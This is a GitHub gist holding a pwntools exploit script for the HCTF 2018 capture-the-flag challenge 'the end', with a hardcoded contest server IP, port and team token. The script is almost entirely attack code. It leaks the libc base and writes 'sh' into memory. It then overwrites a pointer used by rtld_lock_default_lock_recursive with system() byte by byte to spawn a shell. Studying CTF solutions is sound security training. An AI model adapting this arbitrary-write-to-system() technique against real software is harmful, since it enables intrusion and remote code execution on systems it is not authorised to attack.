Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.py

Created Nov 13, 2018
Embed
What would you like to do?
HCTF 2018 the end
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# libc = ELF('./libc64.so')
elf = ELF('./the_end')
context(os='linux', arch=elf.arch)
# context(log_level='debug') # output verbose log
RHOST = "150.109.46.159"
RPORT = 20002
LHOST = "127.0.0.1"
LPORT = 20002
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
conn.sendlineafter('token', 'R4UKcyMU6RpnypSEewwounQDoDWAADeJ')
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./the_end'], gdbscript=gdbscript)
else:
conn = process(['./the_end'])
# conn = process(['./the_end'], env={'LD_PRELOAD': './libc64.so'})
if opt == 'a': gdb.attach(conn)
# exploit
log.info('Pwning')
conn.recvuntil('here is a gift ')
libc_base = int(conn.recv(14), 16) - 0xcc230
conn.recvline()
addr = libc_base + 0x5f0f48 # this address has address of rtld_lock_default_lock_recursive()
val = p64(libc_base + 0x45390) # system()
# write 'sh'
conn.send(p64(libc_base + 0x5f0948 ))
conn.send('s')
conn.send(p64(libc_base + 0x5f0948 + 1 ))
conn.send('h')
# write system()
for i in range(3):
conn.send(p64(addr + i))
time.sleep(0.1)
conn.send(val[i])
time.sleep(0.1)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.